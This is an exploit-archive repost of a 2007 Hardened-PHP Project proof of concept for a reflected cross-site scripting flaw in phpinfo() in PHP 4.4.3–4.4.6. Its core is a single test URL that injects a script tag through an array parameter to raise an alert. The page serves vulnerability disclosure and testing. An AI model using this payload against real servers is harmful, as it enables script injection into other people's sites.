PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability
# Published : 2007-03-04
# Author : Stefan Esser
# Previous Title : Opera <= 9.10 Configuration Overwrite
# Next Title : MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit

////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ | || || _  //
  // | __ |/ _` || '_|/ _` |/ -_)| '  / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|__,_||_|  __,_|___||_||_|___|__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //                    PHP 4 - phpinfo() XSS Testcase                  //
  ////////////////////////////////////////////////////////////////////////

To manually test for this vulnerability just call the phpinfo() page with a parameter like this.

http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>

# www.Syue.com [2007-03-04]